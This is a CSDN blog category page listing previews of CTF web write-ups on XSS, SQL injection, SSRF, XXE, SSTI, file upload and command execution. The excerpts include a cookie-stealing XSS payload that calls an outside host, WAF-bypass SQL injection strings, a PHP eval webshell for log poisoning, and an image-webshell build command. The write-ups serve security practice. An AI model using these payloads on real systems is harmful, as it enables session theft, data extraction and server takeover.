![](https://img-blog.csdnimg.cn/20201014180756928.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
web
文章平均质量分 70
multi4
这个作者很懒,什么都没留下…
展开
-
ctfshow XSS
收集一下可用的姿势吧,window.open:open() 方法用于打开一个新的浏览器窗口或查找一个已命名的窗口。location.href=”/url” 当前页面打开URL页面windows.location.href=”/url” 当前页面打开URL页面onfocus 事件在对象获得焦点时发生autofocus 属性规定当页面加载时 input 元素应该自动获得焦点。<script>window.open('http://ip:端口/'+document.cookie)</原创 2021-10-07 14:32:54 · 216 阅读 · 0 评论 -
ctfshow- java
web279-294 296-297yu师傅脚本通杀 下载 下载链接:https://pan.baidu.com/s/19yr0tWbG1UU_ULjEan5ttQ 提取码:bn71具体用法在md文件中,例如检测python Struts2Scan.py -u http://94c4c47e-4fb3-408c-97d7-56a5094f84a7.chall.ctf.show/S2-001/login.action利用python Struts2Scan.py -u http://94c4c47原创 2021-08-25 23:22:55 · 543 阅读 · 0 评论 -
ctfshow_ThinkPHP专题
web569-- 路由打开页面是这样的这里的话推荐想看一下3.2.3的开发手册,网站地址是ThinkPHP3.2.3完全开发手册不想看的,我就简单的截取一张图片来看一下PATHINFO模式下面的URL访问地址是:http://localhost/index.php/home/user/login/var/value/然后根据提示直接构造就是了payload:http://1a941035-d87a-4eea-9068-77062fa67c57.challenge.ctf.show:80原创 2021-07-02 14:08:17 · 405 阅读 · 3 评论 -
ctfshow 代码审计
web301这里看了一下文件发现,就一些登入页面文件然后简单看了一下文件,定位到checklogin.php这个文件,做个简单的代码审计<?phperror_reporting(0);session_start();require 'conn.php';$_POST['userid']=!empty($_POST['userid'])?$_POST['userid']:""; //判断当前传入的userid是否为空,空的话返回为空$_POST['userpwd']=!empty(原创 2021-05-21 11:52:05 · 703 阅读 · 0 评论 -
[MRCTF2020]Ez_bypass 1
源码include 'flag.php';$flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}';if(isset($_GET['gg'])&&isset($_GET['id'])) { $id=$_GET['id']; $gg=$_GET['gg']; if (md5($id) === md5($gg) && $id !== $gg) { echo 'You got th原创 2021-05-17 08:16:49 · 373 阅读 · 0 评论 -
安全狗- bypass技巧
sql注入bypass判断是否存在注入payload?id=2' and -ascii('a')=-abs('-97') --+hhp参数污染payload?id=1' /*&id=1' order by 99 --+ */报错注入payload?id=1' /*&id=-1'and(select extractvalue(1,concat('~',(select group_concat(table_name) from information_schema.table原创 2021-05-07 23:17:47 · 207 阅读 · 0 评论 -
ctfshow_反序列化
文章目录WEB254web255WEB254源码:error_reporting(0);highlight_file(__FILE__);include('flag.php');class ctfShowUser{ public $username='xxxxxx'; public $password='xxxxxx'; public $isVip=false; public function checkVip(){ return $this-原创 2021-01-27 23:13:34 · 1535 阅读 · 1 评论 -
ctfshow-php特性系列
文章目录WEB89-数组绕过WEB90-intval绕过WEB91-preg_match-换行绕过WEB92-科学计数法EWEb93WEB94WEB95WEB96WEB97-MD5绕过WEB98WEB89-数组绕过源码:include("flag.php");highlight_file(__FILE__);if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){原创 2021-04-10 17:57:57 · 1154 阅读 · 0 评论 -
ctfshow_XXE
文章目录WEB373WEB373这里先放看一下理解漏洞之 XXE 漏洞error_reporting(0);libxml_disable_entity_loader(false);$xmlfile = file_get_contents('php://input');if(isset($xmlfile)){ $dom = new DOMDocument(); //创建内部类Document对象 $dom->loadXML($xmlfile, LIBXML_NOENT |原创 2021-03-24 23:33:31 · 300 阅读 · 0 评论 -
ctfshow_sql注入
文章目录WEB172WEB173WEB172查询语句//拼接sql语句查找指定ID用户sql = “select username,password from ctfshow_user2 where username !=‘flag’ and id = '”.$_GET[‘id’]."’ limit 1;";返回逻辑//检查结果是否有flagif($row->username!==‘flag’){$ret[‘msg’]=‘查询成功’;}这里说我们返回的语句中不能包含flag原创 2021-03-14 17:24:15 · 1407 阅读 · 2 评论 -
ctfshow_nodejs
这里写目录标题web334web335方法一方法二web336web334打开题目下载源码打开longin.jsvar express = require('express');var router = express.Router();var users = require('../modules/user').items; var findUser = function(name, password){ return users.find(function(item){ r原创 2021-03-13 15:27:42 · 278 阅读 · 0 评论 -
ctfshow_爆破
这里写目录标题web23web24web23<?php/*# -*- coding: utf-8 -*-# @Author: h1xa# @Date: 2020-09-03 11:43:51# @Last Modified by: h1xa# @Last Modified time: 2020-09-03 11:56:11# @email: h1xa@ctfer.com# @link: https://ctfer.com*/error_reporting(0);原创 2021-03-10 21:34:40 · 233 阅读 · 0 评论 -
ATT&CK红队评估实战靶场(二)
文章目录网段扫描靶场下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/3/DCIP:10.10.10.10OS:Windows 2012应用:AD域WEB(初始的状态默认密码无法登录,切换用户 de1ay/1qaz@WSX 登录进去)IP1:10.10.10.80IP2:192.168.111.80OS:Windows 2008应用:Weblogic 10.3.6 MSSQL 2008PCIP1:10.10.10.201IP2原创 2021-03-09 22:07:21 · 1188 阅读 · 1 评论 -
ctfshow_1024
文章目录1024_图片代理1024_图片代理打开网页可以感觉到这个GET提交的参数是base64编码的。这里去base64网站解码发现是一个网址然后加载图片的,这时候我们想到文件包含这里我们先试一下读一下本地的/etc/passwd,这里注意一下要base64编码一次.先看一下伪协议的用法。这里看密码文件发现是个nginx的网站.尝试直接读取file:///flag,没有回显,然后就懵逼了hhh,考虑下其他方面,比如默认的配置文件啥的,因为前面读密码的时候读出了是nginx这里我们访问一下,原创 2021-03-08 23:09:21 · 282 阅读 · 0 评论 -
ctfshow_WEBak赛
这里写目录标题web1_观字web1_观字<?php#flag in http://192.168.7.68/flagif(isset($_GET['url'])){ $url = $_GET['url']; $protocol = substr($url, 0,7); if($protocol!='http://'){ die('仅限http协议访问'); } if(preg_match('/\.|\;|\||\<|\>|原创 2021-03-07 18:01:11 · 115 阅读 · 0 评论 -
[第二章 web进阶]SSRF Training 1
一开始打开环境,可以看到一个链接,打开看一下。打开是个代码审计<?php highlight_file(__FILE__);//用PHP高亮显示当前的文件function check_inner_ip($url) //获取url的域名,将域名转为ip,然后再判断这个ip是否是私有地址{ $match_result=preg_match('/^(http|https)?:\/\/.*(\/)?.*$/',$url); //返回$url的匹配,值将是 0 次(不匹配)或 1原创 2021-03-05 11:55:31 · 1413 阅读 · 0 评论 -
ctfshow_ssrf
WEB351<?phperror_reporting(0);highlight_file(__FILE__);$url=$_POST['url'];$ch=curl_init($url);//创建一个新cURL资源curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);//如果成功只将结果返回,不自动输出任何内容。//如果失败返回FALSE$result=curl_exec($原创 2021-02-24 17:28:05 · 1281 阅读 · 0 评论 -
ATT&CK红队评估实战靶场(一)
文章目录前言环境搭建攻入内网信息收集探测同网段主机存活探测端口操作系统、版本利用可用端口前言靶机下载地址:ATT&CK红队评估实战靶场拓扑图:通过模拟真实环境搭建的漏洞靶场,完全模拟ATK&CK攻击链路进行搭建,形成完整个闭环。虚拟机默认密码为hongrisec@2019。环境搭建名字hostpasswd说明windos7192.168.93.0/24 192.168.142.0/24hongrisec@2019web服务器win2K219原创 2021-02-22 15:50:53 · 4724 阅读 · 0 评论 -
nmap简单使用
文章目录常见端口扫描存活主机端口扫描扫描半开放扫描扫描udp端口Nmap的操作系统指纹识别技术:常见端口端口扫描工具,即借助工具,试图了解所扫描IP提供的计算机网络服务类型(网络服务均与端口号相关),从而发现攻击弱点,常见服务对应端口号:服务端口号HTTP80HTTPS443Telnet23FTP21SSH(安全登录)、SCP(文件传输)、端口重定向 22SMTP25POP3110WebLogic7001TOMCAT原创 2021-02-09 22:32:30 · 151 阅读 · 0 评论 -
ctfshow_信息收集
文章目录WEB1WEB2WEB3WEB4WEB5WEB6WEB7WEB8WEB9WEB10WEB11WEB12WEB13web14WEB15WEB16_探针WEB17_IPWEB18_查看js代码WEB19_前台js绕过WEB20WEB1F12查看源代码WEB2禁用javascriptWEB3用burp抓包WEB4访问robots.txtWEB5phps文件泄露,访问index.phpsWEB6www.zip文件泄露,访问得flagWEB7.git泄露,访问.gitWEB8.原创 2021-02-07 17:28:45 · 528 阅读 · 0 评论 -
ctfshow_文件上传
文章目录web151WEB152WEB153WEB154WEB155web151禁用jsWEB152burp改包WEB153这里利用.user.ini.先写好一个.user.ini内容如下:在写一个shell.png通过burp上传访问upload页面即可,接下来用蚂蚁剑连接。WEB154这里考的是短标签和上面一样,只是把图片里面的内容改成短标签风格即可<?=eval($_POST[1]);?>WEB155和上题一样...原创 2021-02-04 22:11:33 · 490 阅读 · 0 评论 -
ctfshow命令执行
文章目录WEB29做题前先看看命令执行小技巧命令执行绕过总结WEB29error_reporting(0);if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__);}方法一:模糊搜索payload:?c=system(‘cat f*’);解法二:了原创 2021-02-06 15:42:58 · 1178 阅读 · 0 评论 -
day5-escapeshellarg与escapeshellcmd使用不当
文章目录Day 5 - postcardescapeshellcmd()函数escapeshellarg()函数小案列总结:Day 5 - postcardescapeshellcmd()函数escapeshellarg()函数escapeshellarg — 把字符串转码为可以在 shell 命令里使用的参数小案列可见两个函数配合使用就会导致多个参数的注入。1、传入的参数是:172.17.0.2’ -v -d a=12、经过escapeshellarg处理后变成了’172.17.原创 2021-01-09 14:47:35 · 2294 阅读 · 0 评论 -
python SSTI tornado render模板注入
原理tornado render是python中的一个渲染函数,也就是一种模板,通过调用的参数不同,生成不同的网页,如果用户对render内容可控,不仅可以注入XSS代码,而且还可以通过{{}}进行传递变量和执行简单的表达式。简单的理解例子如下:import tornado.ioloopimport tornado.web class MainHandler(tornado.web.RequestHandler): def get(self): self.render(原创 2020-12-17 19:17:52 · 2362 阅读 · 0 评论 -
web
文章目录web 4日志注入web 4日志注入查看日志?url=/var/log/nginx/access.log进行日志注入<?php @eval($_POST['a']);?>蚂蚁剑连接原创 2021-02-04 22:51:39 · 52 阅读 · 0 评论 -
记一次waf笔记
Waf从入门到Bypass原创 2021-02-04 22:51:05 · 103 阅读 · 0 评论 -
php伪协议详细总结
php伪协议实现命令执行的七种姿势PHP伪协议总结原创 2020-12-05 21:31:25 · 1548 阅读 · 0 评论 -
Django,结合PHP命令执行
URL编码对照表当输入边界值%80时系统产生报错知识点:宽字节注入原创 2020-12-05 21:15:51 · 282 阅读 · 0 评论 -
从一道题看数组的key溢出问题
<?php//php5.5.9$stuff = $_POST["stuff"];$array = ['admin', 'user'];if($stuff === $array && $stuff[0] != 'admin') { //个判断,既要数组强等于,又要首元素不等 $num= $_POST["num"]; if (preg_match("/^\d+$/im",$num)){ // i不区分大小写 // m使边.原创 2020-12-05 14:17:58 · 1198 阅读 · 1 评论 -
flask模板注入
flask基础ssti:SSTI就是服务器端模板注入(Server-Side Template Injection),也给出了一个注入的概念,通过与服务端模板的 输入输出 交互,在过滤不严格的情况下,构造恶意输入数据,从而达到读取文件或者getshell的目的因为flask使用Jinja2渲染引擎,可以在前端通过{{}}的形式使用变量或者{% %}执行python语句,存在注入的可能(不懂的话先去看flask!)因为flask是用的python语言,所以python中的一些内置函数可以在flask中被原创 2021-02-04 22:49:15 · 2835 阅读 · 1 评论 -
web渗透信息收集技巧方法汇集
1.Google Hacking:相关教程利用搜索引擎的原理进行特殊语句查询。2.Shodan使用:相关教程搜索互联网链接设备(摄像头、路由器、服务器)3.站长之家:网站地址搜索网站信息,模拟蜘蛛访问对网站内部链接进行检测4.钟馗之眼的使用:相关教程搜索互联网空间中的设备、网站及其使用的服务或组件等信息5.Robtex:网站地址DNS查询专用6.Searchdns:网站地址ip地址信息查询7.WWWSCAN(轻量化软件):下载地址网站后台扫描工具...原创 2020-12-01 23:24:34 · 381 阅读 · 1 评论 -
文件上传图片马绕过
图片马制作先准备一个一个shell.php的文件,还有一张图片。copy 3.jpg/b + shell.php/a 10.jpg## 二次渲染原创 2021-02-04 22:47:35 · 70 阅读 · 0 评论 -
MySQLi基于面向对象的编程
mysqli在windows上,对于PHP 5.3或更新版本,mysqli扩展默认开启,对于PHP 5.0 5.1 5.2,mysqli扩展默认并不会开启,因此php.ini中php_mysqli.dll这个DLL 必须开启。MySQLi基于面向过程的编程和面向对象的编程是相对的,其中使用到的方法都是可以类比的。连接数据库header("Content-type:text/html;charset=utf-8");$mysqli = new mysqli("localhost", "root",.转载 2020-11-28 23:08:24 · 269 阅读 · 0 评论 -
MySQLi基于面向过程的编程
mysqli在windows上,对于PHP 5.3或更新版本,mysqli扩展默认开启,对于PHP 5.0 5.1 5.2,mysqli扩展默认并不会开启,因此php.ini中php_mysqli.dll这个DLL 必须开启。MySQLi基于面向过程的编程和面向对象的编程是相对的,其中使用到的方法都是可以类比的。连接数据库header("Content-type:text/html;charset=utf-8");$link = mysqli_connect( 'localhost' , .转载 2020-11-28 22:38:25 · 112 阅读 · 0 评论 -
upload_labs闯关
第一关这里第一关提示然后我们可以创建一个文本文件写入一句话木马,然后把里面内容写成是一句话木马,再把文件名修改一下。<?php eval($_POST['a']); ?>然后上传文件,用burp修改一下后缀名为php,上传过去用蚂蚁剑连接一下就可以了。第二关...原创 2020-10-29 17:00:22 · 215 阅读 · 0 评论